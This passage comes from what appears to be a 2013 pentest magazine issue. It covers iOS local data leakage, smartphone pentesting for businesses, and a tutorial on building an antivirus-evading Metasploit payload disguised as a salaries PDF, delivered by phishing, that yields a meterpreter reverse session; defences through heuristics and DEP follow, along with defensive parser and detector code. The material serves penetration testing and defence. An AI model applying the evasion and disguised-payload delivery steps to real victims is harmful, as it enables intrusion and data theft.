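        return any(SECRET_TOKEN in s for s in carved)


if __name__ == "__main__":
    print("default:       token still in file ->", deleted_token_survives(False))
    print("secure_delete: token still in file ->", deleted_token_survives(True))
```

secure_delete only covers the main file; a test should also collect any -journal or -wal file sitting next to the database, since those hold page images of their own.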

Caching Mechanisms and File Caching

Caching mechanisms are generally used by developers to store remote data locally in order to increase performance and reduce network load. Oftentimes developers will roll their own caching solutions, but generally they will use a third party library such as the popular EGOCache (https:// in order to provide caching functionality. These solutions simply persist data to local storage in a structured format. These caches are often stored in plain text and easily viewable using tools such as iExplorer on a non-jailbroken device. Along with caching mechanisms, .plist files, SQLite files, binary cookies and snapshots, iOS applications can store files in other formats like pdf, xls, txt, and so on, when viewed from the application.

Keyboard Cache

In an effort to learn how users type, iOS devices utilize a feature called Auto Correction to populate a local keyboard cache on the device. The keyboard cache is designed to autocomplete common words predictively. The problem with this feature is that it records everything that a user types in text fields. The cache keeps a list of approximately 600 words. The keyboard cache is located in the Library/Keyboard/en_GB-dynamic-text.dat file. To view the keyboard cache (, copy the en_GB-dynamic-text.dat file to a computer over SSH and open the file using a hex editor. The keyboard cache does not store the information typed in fields that are marked as secure. By default, password fields and strings consisting of all digits (PINs and credit card numbers) are marked as secure. Hence, data typed in those fields is not stored in the keyboard cache. However, data typed in other text fields like username, security questions and answers might get stored in the keyboard cache. During a pentest, clear the existing keyboard cache by navigating to iPhone Settings -> General -> Reset -> Reset Keyboard Dictionary, then browse the application and enter data in the text fields, and analyze whether the data is getting stored in the keyboard cache or not.

Along with the keyboard cache, when a user copies data from a text field, iOS stores the data in a pasteboard (the clipboard in other operating systems). The pasteboard is shared among all applications, so the information copied in one application can be accessed from other applications by reading the pasteboard.

Snapshot Storage

Pressing the iPhone home button shrinks the iOS application and moves it to the background with a nice effect. To create that shrinking effect, iOS takes a screenshot of the application and stores it in the Library/Caches/Snapshots folder in the respective application’s home directory. This might result in storing the user’s sensitive information on the device without the user’s knowledge. Snapshots stored on the iPhone will automatically clear after the device is rebooted.

Most iOS applications do not want to prompt the user for login every time. So, they create persistent cookies and store them in the cookies.binarycookies file in the application’s home directory. During the penetration test, investigate the cookies.binarycookies file for sensitive information and to find session management issues. Cookies.binarycookies is a binary file and the content is not in a readable format.
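A parser for the Cookies.binarycookies file discussed above, as an added example that is not from the article. The field layout follows the publicly reverse-engineered binarycookies format ("cook" magic, big-endian page table, little-endian pages and cookie records, dates as seconds since 2001-01-01) and is an assumption for any particular iOS build; the sample file, its cookie names and its placeholder values are constructed by the block itself so it runs offline.

```python
"""Parse a Cookies.binarycookies file and flag risky session cookies.

Added example, not code from the article. The layout follows the publicly
reverse-engineered binarycookies format; treat it as an assumption for any
particular iOS build. The sample file is constructed here.
"""
import struct
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

MAC_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)  # cookie dates count from here
FLAG_SECURE, FLAG_HTTPONLY = 0x1, 0x4
RECORD_HEADER = 56  # fixed-size part of a cookie record; NUL-terminated strings follow


@dataclass
class Cookie:
    url: str
    name: str
    path: str
    value: str
    secure: bool
    http_only: bool
    expires: datetime


def _mac_seconds(d: datetime) -> float:
    return (d - MAC_EPOCH).total_seconds()


def _encode_cookie(url, name, path, value, flags, expires, created) -> bytes:
    """Serialise one cookie record (used only to build the sample file)."""
    strings = [s.encode() + b"\x00" for s in (url, name, path, value)]
    offsets, pos = [], RECORD_HEADER
    for s in strings:
        offsets.append(pos)
        pos += len(s)
    head = struct.pack("<IIIIIIII", pos, 0, flags, 0, *offsets)  # pos == record size
    head += b"\x00" * 8 + struct.pack("<dd", _mac_seconds(expires), _mac_seconds(created))
    return head + b"".join(strings)


def _encode_page(records: list[bytes]) -> bytes:
    """A page: 00 00 01 00, LE cookie count, LE record offsets, 4 zero bytes, records."""
    n = len(records)
    offsets, pos = [], 12 + 4 * n
    for r in records:
        offsets.append(pos)
        pos += len(r)
    return (b"\x00\x00\x01\x00" + struct.pack("<I", n)
            + struct.pack("<%dI" % n, *offsets) + b"\x00" * 4 + b"".join(records))


def build_sample_file() -> bytes:
    """Constructed sample: a well-flagged CSRF cookie and a persistent session
    cookie written without Secure or HttpOnly (placeholder values)."""
    created = MAC_EPOCH + timedelta(days=4000)
    good = _encode_cookie("example.com", "csrf", "/", "PLACEHOLDER-CSRF",
                          FLAG_SECURE | FLAG_HTTPONLY, created + timedelta(days=1), created)
    bad = _encode_cookie(".example.com", "sessionid", "/", "PLACEHOLDER-SESSION",
                         0, created + timedelta(days=365), created)
    page = _encode_page([good, bad])
    # magic, BE page count, BE page sizes, pages; trailing bytes are not parsed
    return b"cook" + struct.pack(">I", 1) + struct.pack(">I", len(page)) + page + b"\x00" * 4


def _cstring(buf: bytes, start: int) -> str:
    return buf[start:buf.index(b"\x00", start)].decode("utf-8", "replace")


def parse_binarycookies(data: bytes) -> list[Cookie]:
    """Walk the page table and decode every cookie record."""
    if data[:4] != b"cook":
        raise ValueError("not a binarycookies file")
    num_pages = struct.unpack(">I", data[4:8])[0]
    sizes = struct.unpack(">%dI" % num_pages, data[8:8 + 4 * num_pages])
    pos, cookies = 8 + 4 * num_pages, []
    for size in sizes:
        page = data[pos:pos + size]
        pos += size
        n = struct.unpack("<I", page[4:8])[0]
        for off in struct.unpack("<%dI" % n, page[8:8 + 4 * n]):
            rec_size, _, flags, _, u, nm, p, v = struct.unpack("<IIIIIIII", page[off:off + 32])
            rec = page[off:off + rec_size]
            expires_s = struct.unpack("<d", rec[40:48])[0]  # creation time sits at rec[48:56]
            cookies.append(Cookie(_cstring(rec, u), _cstring(rec, nm), _cstring(rec, p),
                                  _cstring(rec, v), bool(flags & FLAG_SECURE),
                                  bool(flags & FLAG_HTTPONLY),
                                  MAC_EPOCH + timedelta(seconds=expires_s)))
    return cookies


def risky_cookies(cookies: list[Cookie]) -> list[str]:
    """Cookies that look like session material but lack Secure or HttpOnly."""
    return [c.name for c in cookies
            if any(k in c.name.lower() for k in ("sess", "auth", "token"))
            and not (c.secure and c.http_only)]
```

On a real device, read the cookies.binarycookies file from the application's home directory and pass its bytes to parse_binarycookies; risky_cookies then lists the session-like cookies that were persisted without the Secure and HttpOnly flags, which is the session management weakness the text asks you to look for, and the expires field shows how long the session survives on a lost phone.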

Push Notification

Often overlooked during a mobile pentest is the analysis of push notifications. Applications use push notifications for various reasons and can display an alert or banner on the device, play a sound, or put a badge on an application’s icon. Apple’s iOS allows some tasks to truly execute in the background when a user switches to another app (or goes back to the home screen), yet most apps will return and resume from a frozen state right where they left off. Alerts or banners have the ability to open the application when an action button or banner is tapped. If used, the following information can be obtained through this vehicle:
• Company confidential data or intellectual property in the message payload: Even though end points in the APN architecture are TLS encrypted, Apple is able to see your data in cleartext. There may be legal ramifications of disclosing certain types of information to third parties such as Apple.
• Push used for critical notifications: The push architecture should not be relied upon for critical notifications. iPhones that are not connected to cellular data (or when the phone has low to no signal) MAY not receive push notifications when the display is off for a specific period, since Wi-Fi is often automatically turned off to preserve battery.
• Push notification handler used to modify user data: In this case, the user of the application may not have intended to perform any transaction that results in the modification of his or her data.
• Validate outgoing connections to the APN: The root Certificate Authority for Apple’s certificate is Entrust. Make sure pen testers have Entrust’s root CA certificate to verify that your outgoing connections (that is, from the server side architecture) are to the legitimate APN servers and not a rogue entity.
• Potential unmanaged code: Look for memory management and bounds checking issues by constructing the injected payload outbound to the APN using memory handling APIs in unmanaged programming languages.
• SSL certificate and list of device-tokens in your web-root: Look for an inadvertently exposed Apple signed APN certificate, its associated private key, and device-tokens in the device web-root.
Applications that support push notifications on the iOS platform used to use a UDID to identify the device, but now they use a device token. This device token is passed to the application after a user agrees to receive push notifications when prompted by the app.

Error Logs

In general, iOS applications write data into logs for diagnostic and troubleshooting purposes. In addition, during development, application developers commonly use NSLog for debugging purposes. These logs might include requests, responses, cookies, authentication tokens, and other sensitive data. On the iPhone, data passed to the NSLog function is logged by the Apple System Log (ASL) and the data remains in the log until the device is rebooted. Also, error logs are not bounded by the application’s sandbox, which means error logs generated by one application can be read by other applications. Therefore, if an application logs sensitive data, a malicious application can actively query for this data and send it to a remote server.


In summary, in order to adequately test mobile applications, it is worthwhile to take the time to learn the underlying architecture of the operating system and techniques used by developers. This way, pentesters can quickly determine what rocks to turn over and find vulnerabilities.

Michael Trofi

Michael Trofi is a security consultant and CSO for CST Strategic Advisors. He has over 30 years of experience in system deployment and development and over 15 years in Information Security. He has a degree in Digital Electronic Engineering and holds certificates such as CISSP, CISM and CGEIT. At CST Strategic Advisors, Michael focuses on security governance, compliance, threat modeling, risk assessment, policy development, internal/external network penetration testing, mobile and application penetration testing and other areas in security.

Duane Schleen

Duane Schleen has over 19 years of experience developing enterprise software solutions and has been architecting and developing mobile applications since 2001. He has both produced and developed multiple top selling applications on the App Store since the iOS SDK was first released in 2008. He resides in Golden, CO where he works as an iOS Developer.

Starter Kit 03/2013

Smartphone Pentesting Could Save your Business
Can you imagine a fully functional company without mobile phones nowadays? Even though these seem like an immense blessing, we cannot forget that they sometimes might do more harm than good. In this article you will read about the basics of pentesting and how you can use it to improve company security in the particular area.

Article comes from Pen Test Starter Kit. Download the complete issue.

Who needs pentesting for smartphones? The honest answer is that most businesses do. Company owned phones are often allotted to employees so they can work better. But these little crafty devices can become the source of mayhem in the case of a data leak, hack, data breach, and a whole host of other problems. And it’s not just company owned phones; the BYOD culture has taken every work environment by storm, and the dust doesn’t seem like it’ll settle anytime soon. Most companies have opened their arms to this trend and embraced it like a long lost child. However, there’s a very real risk that a BYOD phone brings to the table for firms. Pentesting has never before been as important for businesses who want to stay secure. A combination of pentesting for smartphones and education for employees in terms of security issues could go a long way.


Why Pentest Smartphones?

IT departments globally are adding more coal to their security engines simply because malware and Trojans are becoming too common a phenomenon. In most cases data is extracted from a smartphone and delivered elsewhere with the victim never knowing what happened. In an ideal world IT firms should educate employees in terms of data security, and provide them with tools to get it done right. However, many firms often fail to ensure that their work environment is one that promotes a security aware culture. Data protection should come to employees naturally once they’ve been trained to do so. But this is not the case. More often than not, employees do not have any regard for security – at times intentionally, but often simply because they don’t know what to do for it.

It is important that firms make sure they analyze all points of access for potential data leaks/hacks/etc. But it gets trickier when you realize you’re talking about data protection and control on a device that you don’t even own. Within the office space, company owned equipment is relatively easier to manage. You can set up protocols for how company owned devices will be used, managed and maintained. Smartphones are harder to keep a check on because once they’re allotted to an employee, no company goes running after them every second to check whether they’re maintaining data in a safe manner. That being said, you can still control how an employee manages their phone to an extent, if it is company owned. BYOD, however, is a whole different story altogether. Businesses are increasingly allowing BYOD presence because they’re not just cost effective but also help promote continuity in terms of work. And while they present great opportunities for effective growth, what they do not allow is control. You cannot take an employee’s phone and regulate it like you could an office device. There’s no legal way of tracking said phones, and you can’t alter their system so they’re more secure. As more and more employers allow BYOD to infiltrate their work environments, they forget that they can’t limit failures caused by said devices.

And this is where pentesting comes in. It basically tries to look into how and why a smartphone became vulnerable in the first place. iViZsecurity.com undertook research in 2012 which showed that over 99% of web apps have at least one vulnerability, while 82% have a vulnerability that is highly critical – and that’s just one mode of infiltration, albeit one of the most popular ones. Anything that is downloaded into a phone can kick the doors open a little wider for malware to stroll in. There are a few main areas that are directly affected when personal smartphones are made part of the official work environment.

Company information and data

Employees access all kinds of information on their smartphones; with the rapid addition of features over the course of the last few years, simply viewing files isn’t enough, and there are several occasions where employees actually create entire documents as well. CISCO recently conducted research where they looked into insider threats, i.e. employees and the trouble they can cause. The global report analyzed data loss and leakage that came from an employee’s misdoings or mistakes. The white paper reported that around 39% of IT professionals around the globe are more concerned about threats that stem from their own employees, rather than outside attacks from hackers. On top of that, 27% admitted they never found out what had been happening in terms of data loss trends that have gradually seen a hike in the recent past. Tackling a leak from within isn’t an easy challenge. Pentesting provides an opportunity to help seal backdoors and eradicate loopholes. It isn’t just company information and data that’s at stake. Company contacts are also in the line of fire. Every single official email that an employee accesses on their phone not only exposes the data and content within the emails but all company contacts as well. Which means, in addition to the leak/loss of information, what we’re looking at is someone potentially getting hold of every important contact that the company has. These contacts can then be manipulated by whoever has accessed them. It could be a competitor or it could just be a hacker. There is no predicting harmful behavior in the digital world.

For a long time now people have had issues with adware running rampant. Free apps fitted with adware extract data so that they can further promote goods and products based on a person’s taste – however, they can also go and tamper with other data on the phone. Additionally, it is important to understand that smartphones are not stand alone devices. Eventually, they will be connected to another official device such as an office desktop or laptop. In the event that a phone’s been infiltrated and has some form of malware, virus, or monitoring software, it’s possible that it can attach itself to the device that the phone connects to. Companies invest a great deal in security and VPNs are thought to be the big saviors when it comes to secure data access. Hackers, malicious apps and software cannot get into the VPN, but if they’re manipulated from within through a phone then the game changes. As soon as the phone is connected to the office network, data becomes at risk. Company data could be put into the most secure vault on the planet; malware that’s using a BYOD device won’t even bat an eyelash before it steals something. In that situation pentesting becomes all the more important.

What’s creeping in

Malware branches out into malicious apps that can easily grab your employee’s phone control and extract whatever data they please. One of the primary routes they take is through exploiting bugs within the phone’s apps, browser and even its kernel. Malicious apps or web pages can easily hit these bugs and use them like hidden backdoors. The phone owners can open a slew of bad links, or download numerous bad apps before realizing that there’s trouble. Free apps are a major contributor to the problem and pose risks which are far more serious than their paid counterparts. VIA Forensics recently conducted a study where it outlined how 75 percent of the apps on a phone do not secure user account names. There’s no encryption there. If an employee is using an app to access company information then that’s a real cause for concern. And the company wouldn’t actually ever find out unless they ran the phone through some form of check.

Smartphones are all about the apps. Be it free or paid, apps have access to multiple strands of data on the phone. Without ensuring that these apps aren’t taking out or recording more than they should from the phone, a company shouldn’t rest. Another problem is the customization of phones. If you jailbreak or root a phone then there’s a whole new world of risk that you’re exposing it to. There’s an additional risk factor involved which shouldn’t be there to begin with. While company owned phones can be controlled in terms of this, a BYOD device which has been jailbroken or rooted presents disturbing consequences. Take the example of an iPhone: if it’s jailbroken then that means the SSH password can be accessed by anyone because it’s literally the same password as any other jailbroken iPhone. With that information anyone can log into the root of the phone and there’s no controlling what they steal or damage from that point onwards. This is nothing compared to the horrors that the Android platform has seen. You don’t even need to root your phone for it to be open to a plethora of problems. In the past apps from within the Play Store have been malicious. Even when an app is not malicious, often it asks for permissions and access to parts of the phone that have nothing to do with it. Android apps do not allow the user to pick and choose what it gives an app access to. While one collects a certain kind of data, another bad app could swoop in and steal all of it. Adware apps do this all the time. And Google in the past hasn’t taken such an active charge against such issues. Androids continue to be the most insecure smartphones around. Cell phone tracking apps and monitoring apps have also been known to hide within phones that have been jailbroken or rooted. And in many cases the phone owner never finds out because these apps have the ability to hide within the user’s phone. They keep transmitting information and data constantly and the user has no clue.

Third party apps in general are a big problem for such phones. Companies in general have absolutely no say in whether their employees jailbreak or root their phones; they can, however, take preventive action against malware threats. They should also create a policy disallowing the rooting or jailbreaking of their own devices while their employees are using them.

The big test

What will a pentest actually look for? What will it help resolve? These are important questions you should ask yourself before you actually get a pentesting session. Ideally all phone platforms should be given a pentest, i.e. Android, iPhone, BlackBerry and Windows Phone. The test should look at external as well as internal threats to smartphones. It is possible that employers would benefit from a combination of pentests instead of one large pentest that overlooks the entire problem. There are multiple service providers on the internet that can help tackle this situation. There are different kinds of tests which should be implemented for the best possible results and the most secure outcome. Pentesting isn’t a simple process that takes you from point A to point B. There are several different methods of checking on the security of a particular platform, in this case smartphones. Typically the employer should be able to point out how much data goes back and forth between the pentesters and the users. The different types of pentests that can be implemented are as follows:

Blind: This form of test would hold that the smartphone owners would not know that a security check is underway. The security team is the one that’s being tested. For all types of firms this is useful when training their own people on how to check for security loopholes within the systems. If pentesters are subjected to this, it’ll be a good way for the firm to confirm their abilities as well.

Double blind: The ones doing the testing don’t know how the system works and the ones that are being tested on don’t know that a test is being conducted. This is an ideal situation because the employees will not be able to alter or change any data on the phone prior to it being checked, and like the blind test the advantages remain the same from the testers’ end.

Black box: A black box test only has the testers go blind while the users know that a test is being conducted. While both blind and double blind methods can be applied to company owned devices (if an official policy has been set up before), the same cannot be said for BYOD. In that scenario this would be the most useful.

White box: This form of test simulates an attack from the inside. Both the tester and the user know of the test. It’s meant to check how insider information can be misused.

Grey box: Tests attack with partial data about the cell phones. Users, both ones with company owned devices and those with BYOD, have complete knowledge of the test that’s being conducted. This is a kind of middle ground between a black box test and a white box test. It helps reduce the time spent in attacking a system to highlight its vulnerabilities. This can be taken as the most appropriate method to execute a pentest for smartphones.
OPEN 06/2013

Some options to choose from

The good people at offer a complete pentesting solution. Their focus lies more on all mobile devices rather than just smartphones. However, their process is extremely comprehensive and they do address smartphones as well. Their approach to pentesting is simple, i.e. they begin by asking who’s using the devices and what (official devices) they’re being connected to. Different methods of exploitation are visited through their services and they help outline where security for the phone has gone wrong. It’s not just the software of the phone that’s addressed but also the social engineering side, i.e. changes in attitudes and behaviors towards security, that is highlighted through their services.

offers a slightly different service than a lot of other pentesting firms. Their Hybrid pentesting services measure mixed types of attacks. This includes four main components, i.e. attacks from trusted networks, wireless networks, attacks on smartphones and lost/stolen devices. Within the context of smartphones the firm can measure what data is lost/stolen over a trusted network from company owned devices. Such networks have a lot fewer restrictions than networks that aren’t trusted, and a lot of data passes over them. If such a network is already compromised then it’ll take the phone’s data down with it; the same is the case with wireless networks. Under this service smartphones will be tested against industrial espionage which takes place through trojaning of the phone. Pentesting activities would include simulation of malicious activity with the main aim of verifying data encryption, device tracing measures, system blockages etc.

offer what they call a security audit system. Their main focus lies on the top most controls on a smartphone. They start by outlining what the sensitive data on a cell phone is, and then test to see how that data is best protected on the mobile device. Password security is also checked and tested on the device to see whether it’s adequate or not. Data travels back and forth over phones constantly; there’s a plethora of information that is exchanged. The pentest from Nethemba also ensures that data, while it’s being transmitted from and to the device, remains safe. This is important for sensitive data. The implementation of authorization/authentication from the user end is also taken into account. Third party applications are a huge problem, and the test tries to check whether the data integration with said services is secure or not. It also applies controls to ensure that paid resources are kept safe and secure. The complete test has a total of 10 main points which are addressed, which means that the pentest from this site covers a lot of aspects. What is important is to ensure that whatever measures are being taken are the ones that directly impact the firm. Of course there are firms that will need a more customized solution and may want to develop their own protocol for pentesting. Bulbsecurity.com has its own smartphone pentest framework. The main aim of this framework is to allow employers to make use of their tool in the most effective and efficient manner possible. What the tool basically does is evaluate the security of the phone in the context of the environment that it exists in. This particular framework was developed under the DARPA Cyber Fast Track grant.

At present the tool up on the site is an open source option that IT departments might be able to actually tweak to their own requirements. Its main purpose is to help facilitate pentesting within an organization. Version 0.1 of the framework has provisions for remote attacks, social engineering attacks, client side attacks along with post exploitation, aimed at smartphones. It’s basically a set of features that can help outline how vulnerable a system really is. The framework can also be fitted in with other devices and tools for a better result. For instance, you can integrate tools such as Metasploit and SET into the framework for a more comprehensive test.

Starter Kit 03/2013

On the Web
• Cell Phone Tracker
• First Base Technologies
• High-Tech Bridge
• Nethemba
• Bulb Security
• web-application-vulnerability-statistics-of-2012/
• research


There are important questions you need to ask yourself as a business administrator or owner. Could the apps on BYOD devices land devastating blows to your business? Can internal data be jeopardized because of synchronization of office equipment with BYOD phones? The threat is a very real one, but only pragmatic firms know when to act, and how to act. For firms that are dealing with data on a daily basis, the likelihood is that staying vigilant is the only answer. In this era even cupcake shops have to make sure they have secure passwords; an IT firm cannot afford not to stay one step ahead. At the end of the day it’s more about keeping your eyes and ears open than anything else. You can put the biggest and best padlocks on your information, but if you forget to close your windows then it’s all pointless. It wouldn’t be a stretch to say that pentesting for smartphones is becoming imperative for businesses in recent times.

Jane Andrew

Jane Andrew writes about everything and anything that touches on security and privacy within the digital world. Her main focus lies on looking at both cell phones and PCs to see which parts are the most vulnerable. She writes for Mobistealth and several other leading websites. She can be reached at @janeandrew01.


AV Evasion:
Bypassing AV Products and Protection Against It
AV evading techniques are getting better and smarter by the day, and having just an Anti-Virus and Anti-Spyware application is insufficient to protect our machines from additional angles of threats.

Article comes from PenTest Regular TO BE RELEASED


As more and more threats emerge, so do the Anti-Virus product vendors, who are consistently trying to keep up with the emerging threats, virus signatures, variants, and behaviors. It has always been a topic of interest to hackers and pentesters everywhere: the ways to bypass security products, from firewalls, Anti-Virus, Anti-Spyware, Intrusion Detection Systems, etc. One of the products attackers most commonly try to evade is the Anti-Virus application, as this feature will most likely be responsible for stopping malware, viruses, and malicious executables from executing on the victim’s machine. This forces attackers to find new ways and processes to evade the application.

The purpose of this article is to provide an end to end, step by step approach to the process of creating an executable that is able to evade AV detection and how it can be executed to provide a meterpreter session to the attacker. This article also describes the ways to prevent such an attack or threat from the perspective of product vendors and of the Windows security settings themselves.

Before We Begin

Metasploit AV Evasion is a payload generator that avoids most Anti-Virus products. It was released as open source by NCC Group Plc. Its features include:
• Generating a Metasploit executable payload to bypass AV detection,
• Generating a Local or Remote Listener,
• Disguising the executable file with a PDF icon,
• Execution of the executable is minimized on the victim’s computer,
• Automatically creating AutoRun files for CD-ROM exploitation.

To install metasploitavevasion, fire up BackTrack or Kali and run the command (see Figure 1):
#git clone

Figure 1. Installing metasploitavevasion

Providing Access to
#chmod a+x

Creating the Executable

To execute it, go to the metasploitavevasion directory and run the command (see Figure 2):

Figure 2. Start the metasploitavevasion by running the #./

Select local or remote system. If you select local, it will auto grab your local IP address and use that. If you select alternative, it will ask you which IP address to listen on, then give you the msf listener code to run at the end (see Figure 3). In this case I used port 443 (see Figure 4). There are five options for the payload. The stealthier the option you choose, the bigger the file is and the more random data it creates, with the intention of reducing the detection ratio. In this case, I have chosen option 5, which is Desperate Stealth (see Figure 5), and it generated an executable with a size of 135 MB. It will then output an executable called salaries.exe in the /root/metasploitavevasion/ directory (see Figure 6). You can copy this to your CD or thumb drive and use phishing or social engineering techniques to take advantage of the curiosity of the system’s owner to run it. To make it more interesting, I renamed the file Employees Salaries-Confidential.pdf, and by default Windows 7 and Windows Server machines hide the extension of files. With the PDF icon embedded in it, it is more believable (see Figure 7).

Testing Against Symantec AV and McAfee AV

To test my newly created executable, I used the McAfee and Symantec Endpoint Protection Anti-Virus and Anti-Spyware features to see whether it gets detected (see Figure 8). Note: both products were used with the Anti-Virus and Anti-Spyware feature only.
Test Case 1: Scanned against McAfee. Result: Undetected.
Test Case 2: Scanned against Symantec Endpoint Protection (see Figure 9). Result: Undetected.
Note: The date this article was written was 14th July 2013.
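The disguise described above (an executable named to look like a PDF, relying on Explorer hiding known extensions) can be caught on the defender’s side without any signature by comparing what a file name claims with what its first bytes are. The following is an added example, not code from the article or from the NCC Group tool; the file names and sample bytes are constructed here, and the PE stub is only the minimal header layout the check inspects, not a real program.

```python
import struct
from pathlib import PurePath

# Extensions a user expects to open as a document rather than run as a program.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt"}
# Extensions Windows will execute on double-click.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd"}

REASON_PE_UNDER_DOCUMENT_NAME = "content is a PE executable but the name claims a document"
REASON_DOUBLE_EXTENSION = "document extension followed by an executable extension"


def is_pe_image(data: bytes) -> bool:
    """True if data starts with a DOS 'MZ' stub whose e_lfanew field points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of the PE header
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def detect_masquerade(filename: str, data: bytes) -> list:
    """Return the reasons a file looks like a disguised executable (empty list if none)."""
    suffixes = [s.lower() for s in PurePath(filename).suffixes]
    reasons = []
    if not suffixes:
        return reasons
    # Case 1: name ends in .pdf (or another document type) but the bytes are a PE image.
    if suffixes[-1] in DOCUMENT_EXTS and is_pe_image(data):
        reasons.append(REASON_PE_UNDER_DOCUMENT_NAME)
    # Case 2: "report.pdf.exe" is shown as "report.pdf" when Explorer hides known extensions.
    if len(suffixes) >= 2 and suffixes[-2] in DOCUMENT_EXTS and suffixes[-1] in EXECUTABLE_EXTS:
        reasons.append(REASON_DOUBLE_EXTENSION)
    return reasons


def constructed_pe_stub() -> bytes:
    """Constructed sample: the smallest byte layout is_pe_image() accepts (not a runnable program)."""
    buf = bytearray(0x80)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)  # e_lfanew -> PE signature at offset 0x40
    buf[0x40:0x44] = b"PE\x00\x00"
    return bytes(buf)


def scan_samples() -> dict:
    """Run the check over constructed samples; keys are file names, values are reason lists."""
    samples = {
        "Employees Salaries-Confidential.pdf": constructed_pe_stub(),      # PE bytes, PDF name
        "Employees Salaries-Confidential.pdf.exe": constructed_pe_stub(),  # hidden .exe
        "quarterly-report.pdf": b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n",
        "salaries.exe": constructed_pe_stub(),                             # honest name
    }
    return {name: detect_masquerade(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, reasons in scan_samples().items():
        print(f"{name!r}: {reasons or 'name and content agree'}")
```

The same two checks apply to mail attachments or removable media at the point of entry, independently of whether a signature for the payload exists yet.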

Starting the Payload Handler and Listener

We will then run msfconsole and start the listener on a dedicated attacking system (see Figure 11).

Figure 3. Entering the IP of the listener

Figure 4. Choosing what port to listen on

Figure 5. The more stealth you want, the bigger the size of the file

Figure 6. Executable created

Figure 7. Changing the name of the executable to something believable

Figure 8. Scanning the file against McAfee AV

Figure 9. Scanning the file against Symantec AV

In this scenario, we are using the following specifications for the victim’s machine:
• Windows Server 2008 SP2 (64bit) and Windows 7 Enterprise SP1 (64bit),
• Data Execution Prevention is set to Turn on DEP for essential Windows Programs and Services only,
• Symantec Endpoint Protection v11.x Antivirus and Anti Spyware Protection only.

Execution of Employees Salaries-Confidential.pdf

Both machines, when the Employees Salaries-Confidential.pdf was executed, allowed us to get a meterpreter session (see Figure 12) despite having updated definitions for Symantec Endpoint Protection.

Prevention (I)

To prevent such an attack, additional features from product vendors do come in handy. In this case, Symantec Endpoint Protection comes with features like Proactive Threat Protection and Network Threat Protection.

Symantec’s Proactive Threat Protection

Proactive threat scanning provides an additional level of protection to a computer that complements existing AntiVirus, AntiSpyware, Intrusion Prevention, and Firewall protection technologies. AntiVirus and AntiSpyware scans rely mostly on signatures to detect known threats. Proactive threat scans use heuristics to detect unknown threats. The heuristic process scan analyzes the behavior of an application or a process. The scan determines whether the process exhibits the characteristics of a threat, such as Trojan horses, worms, or key loggers. The processes typically exhibit a type of behavior that a threat can exploit, such as opening a port on a user’s computer. This type of protection is sometimes referred to as protection from zero-day attacks.

Testing the Employees Salaries-Confidential.pdf on the System with Proactive Threat Protection and Network Threat Protection Enabled

As soon as we launched the Employees Salaries-Confidential.pdf, Symantec Endpoint Protection was automatically able to detect and block the attack and classify it as a Meterpreter Reverse TCP attack (see Figure 14). In the Security Log (see Figure 15), it is able to log the event, the type of attack, where the attack originated from, and the full path of the executable.

Figure 10. The version of the Symantec Endpoint Protection client used

Figure 11. Starting the Payload Handler

Figure 12. A Meterpreter session

Figure 13. Symantec Endpoint Protection client with additional features

Figure 14. Symantec’s IPS in action

Figure 15. The security log of Symantec Endpoint Protection

Prevention (II)

In the previous test, the DEP (Data Execution Prevention) setting (see Figure 16) was set to Turn on DEP for essential Windows programs and services only. In this test, we are going to set it to: Turn on DEP for all programs and services except those I select. When the Employees Salaries-Confidential.pdf was executed, DEP responded by closing the executable, thus protecting the system from providing a meterpreter session to the attacker (see Figure 17).

• DEP (Data Execution Prevention): http://windows.
• Symantec’s Proactive Threat Protection: http:// ontent&id=TECH102733
• Symantec Endpoint Protection:
• McAfee Anti-Virus:
• Metasploit AV Evasion:
• Metasploit Payload Generator Script: http://www.
• BackTrack Linux:
• Kali Linux:


What is DEP?

Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files. DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.

Figure 16. Data Execution Prevention Option

AV evading techniques are getting better and smarter by the day and, as shown in the above tests, having just an Anti-Virus and Anti-Spyware application is insufficient to protect our machines from additional angles of threats. To defend against such attacks, product vendors have since made their applications come with several other features, such as IPS (Intrusion Prevention System), IDS (Intrusion Detection System), Firewall, and NAC (Network Access Control). These features provide additional levels of security and protection to handle more advanced and newer threats and attacks that the traditional Anti-Virus and Anti-Spyware features could not.

Figure 17. DEP in action

Having graduated with a BSc Degree in Cyber Forensics, Information Security Management and Business Information Systems, Fadli is a security professional at BT Global Services, a company that offers specialized IT security services to customers worldwide. He has over 7 years of experience in the IT industry dealing with operations, support, engineering and consulting, and is currently an ethical hacker performing vulnerability assessment and penetration testing services for domains such as Network Assessments, Wireless Assessments, Social Engineering, Perimeter Device Assessment, and Web App Assessments through open source and commercial tools based on methodologies from OWASP and OSSTMM. Fadli has also conducted training and spoken at seminars on the topics of information security for both the private and government sectors. In his free time, Fadli conducts security research and regularly updates his blog focusing on IT security @

